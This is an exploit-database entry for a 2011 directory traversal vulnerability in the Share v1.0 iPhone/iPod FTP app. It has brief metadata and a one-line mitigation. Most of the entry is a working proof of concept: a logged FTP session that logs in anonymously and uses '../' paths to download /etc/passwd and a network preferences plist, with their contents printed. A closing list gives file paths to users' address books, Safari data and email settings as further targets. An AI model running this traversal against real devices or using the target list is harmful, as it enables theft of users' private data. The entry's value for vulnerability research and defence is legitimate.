header-logo
Suggest Exploit
vendor:
Share
by:
R3d@l3rt, Sunlight, H@ckk3y
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: Share
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:apple:share
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: iPhone, iPod 3GS with 4.2.1 firmware
2011

Share v1.0 for iPhone / iPod touch, Directory Traversal

There is directory traversal vulnerability in the Share. Exploit Testing involves using FTP to connect to the server and using the 'get' command to traverse the directory structure and access sensitive files such as the passwd and com.apple.conference.plist files.

Mitigation:

Ensure that the application is not vulnerable to directory traversal attacks by validating user input and restricting access to sensitive files.
Source

Exploit-DB raw data:

# Exploit Title: Share v1.0 for iPhone / iPod touch, Directory Traversal 
# Date: 02/24/2011
# Author: R3d@l3rt, Sunlight, H@ckk3y
# Software Link : http://itunes.apple.com/kr/app/filer-lite-download-view-manage/id350671847?mt=8
# Version: 1.0
# Tested on: iPhone, iPod 3GS with 4.2.1 firmware  

# There is directory traversal vulnerability in the Share.  
# Exploit Testing

C:\>ftp
ftp> open 192.168.0.70 20000
Connected to 192.168.0.70.
220 DiddyFTP server ready.
User (192.168.0.70:(none)): anonymous
331 Password required for anonymous
Password:
230 User anonymous logged in.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for '/bin/ls'.
total 5
-rw-r--r--     1 mobile mobile      17389 Jan 06 12:55 315978923.951142.png
-rw-r--r--     1 mobile mobile     447330 Jan 06 16:22 315991374.643888.png
-rw-r--r--     1 mobile mobile      17389 Jan 06 16:44 315992677.644726.png
-rw-r--r--     1 mobile mobile     242857 Feb 24 15:52 320223133.910055.png
-rw-r--r--     1 mobile mobile        493 Feb 24 15:50 SpreadMobData.plist

226 Transfer complete.
ftp: 390 bytes received in 0.00Seconds 390000.00Kbytes/sec.
ftp> get ../../../../../etc/passwd
200 PORT command successful.
150 Opening BINARY mode data connection for '../../../../../etc/passwd'.
226 Transfer complete.
ftp: 787 bytes received in 0.01Seconds 52.47Kbytes/sec.
ftp> get ../../../../../../private/var/mobile/Library/Preferences/com.apple.conference.plist
200 PORT command successful.
150 Opening BINARY mode data connection for '../../../../../../private/var/mobile/Library/Preferences/com.apple.conference.plist'.
226 Transfer complete.
ftp: 272 bytes received in 0.00Seconds 272000.00Kbytes/sec.
ftp> quit

C:\>type passwd
#
# 4.3BSD-compatable User Database
#
# Note that this file is not consulted for login.
# It only exisits for compatability with 4.3BSD utilities.
#
# This file is automatically re-written by various system utilities.
# Do not edit this file.  Changes will be lost.
#
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
mobile:*:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false


C:\>type com.apple.conference.plist
bplist00?_restoredFromBackup\natTypeCache?
_DIPv4.Router=192.168.0.1;IPv4.RouterHardwareAddress=1c:bd:b9:XX:XX:XX_EIPv4.R
outer=192.168.11.1;IPv4.RouterHardwareAddress=00:24:a5:XX:XX:XX? XnatFlag
C:\>



# IPhone inside information

1. Phone Book
 - /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb
     
2. Safari Favorites List
 - /private/var/mobile/Library/Safari

3. Users E-mail Information
 - /private/var/mobile/Library/Preferences/com.apple.accountsettings.plist

4. IPv4 Router Information
 - /private/var/mobile/Library/Preferences/com.apple.conference.plist

Navigation

Suggest Exploit

Services By CQR